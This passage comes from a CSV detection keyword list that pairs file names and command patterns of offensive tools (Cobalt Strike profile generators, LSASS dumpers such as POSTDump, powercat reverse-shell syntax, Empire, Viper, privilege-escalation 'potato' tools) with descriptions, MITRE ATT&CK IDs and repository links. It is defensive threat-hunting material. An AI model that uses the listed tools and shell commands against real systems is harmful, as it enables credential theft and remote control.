C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*post_ex_smartinject*",".{0,1000}post_ex_smartinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*post_ex_spawnto_x64*",".{0,1000}post_ex_spawnto_x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*post_ex_spawnto_x86*",".{0,1000}post_ex_spawnto_x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*POST_EXPLOIT_DIR*",".{0,1000}POST_EXPLOIT_DIR.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*post_exploitation.py*",".{0,1000}post_exploitation\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*POSTDump*PROCEXP.sys*",".{0,1000}POSTDump.{0,1000}PROCEXP\.sys.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTDump.csproj*",".{0,1000}POSTDump\.csproj.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTDump.csproj*",".{0,1000}POSTDump\.csproj.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*PostDump.exe *",".{0,1000}PostDump\.exe\s.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*PostDump.exe *",".{0,1000}PostDump\.exe\s.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*PostDump.exe *",".{0,1000}PostDump\.exe\s.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTDump.git*",".{0,1000}POSTDump\.git.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*PostDump.ps1",".{0,1000}PostDump\.ps1","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*POSTDump\Postdump.cs*",".{0,1000}POSTDump\\Postdump\.cs.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTDump\PROCEXP.sys*",".{0,1000}POSTDump\\PROCEXP\.sys.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTDump-main*",".{0,1000}POSTDump\-main.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTDump-main*",".{0,1000}POSTDump\-main.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTDump-main*",".{0,1000}POSTDump\-main.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*postgres_default_pass.txt*",".{0,1000}postgres_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*postgres_default_user.txt*",".{0,1000}postgres_default_user\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*POSTMiniDump.Data*",".{0,1000}POSTMiniDump\.Data.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTMiniDump.Data*",".{0,1000}POSTMiniDump\.Data.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTMiniDump.MiniDump*",".{0,1000}POSTMiniDump\.MiniDump.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTMiniDump.MiniDump*",".{0,1000}POSTMiniDump\.MiniDump.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*POSTMiniDump.Utils*",".{0,1000}POSTMiniDump\.Utils.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*PostMulitDomainSpider.py*",".{0,1000}PostMulitDomainSpider\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostMulitMsfGetDomainInfoByBloodHound.py*",".{0,1000}PostMulitMsfGetDomainInfoByBloodHound\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostPowershellPowerViewAddNetUser.py*",".{0,1000}PostPowershellPowerViewAddNetUser\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostPowershellPowerViewGetNetGroup.py*",".{0,1000}PostPowershellPowerViewGetNetGroup\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostPowershellPowerViewGetNetGroupMember.py*",".{0,1000}PostPowershellPowerViewGetNetGroupMember\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostPowershellPowerViewGetNetProcess.py*",".{0,1000}PostPowershellPowerViewGetNetProcess\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostPowershellPowerViewUserHunter.py*",".{0,1000}PostPowershellPowerViewUserHunter\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*postrequest/link.git*",".{0,1000}postrequest\/link\.git.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*PostRewMsfAuxiliaryCVE*.py*",".{0,1000}PostRewMsfAuxiliaryCVE.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostRewMsfExample.py*",".{0,1000}PostRewMsfExample\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PostRewMsfPostConfInfos.py*",".{0,1000}PostRewMsfPostConfInfos\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PotatoAPI.Mode.DCOMRemote*",".{0,1000}PotatoAPI\.Mode\.DCOMRemote.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*PotatoTrigger.cpp*",".{0,1000}PotatoTrigger\.cpp.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*PowerBreach.ps1*",".{0,1000}PowerBreach\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*PowerBruteLogon.*",".{0,1000}PowerBruteLogon\..{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","115","21","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z" "*powercat -c *",".{0,1000}powercat\s\-c\s.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*powercat -c * -p *",".{0,1000}powercat\s\-c\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*powercat -l *",".{0,1000}powercat\s\-l\s.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*powercat -l -p 4444*",".{0,1000}powercat\s\-l\s\-p\s4444.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Powercat.ps1*",".{0,1000}Powercat\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*powerdump.ps1*",".{0,1000}powerdump\.ps1.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*powerdump.ps1*",".{0,1000}powerdump\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*powerdump.rb*",".{0,1000}powerdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*PowerExtract-main.zip*",".{0,1000}PowerExtract\-main\.zip.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*PowerForensics*",".{0,1000}PowerForensics.{0,1000}","offensive_tool_keyword","PowerForensics","The purpose of PowerForensics is to provide an all inclusive framework for hard drive forensic analysis. PowerForensics currently supports NTFS and FAT file systems. and work has 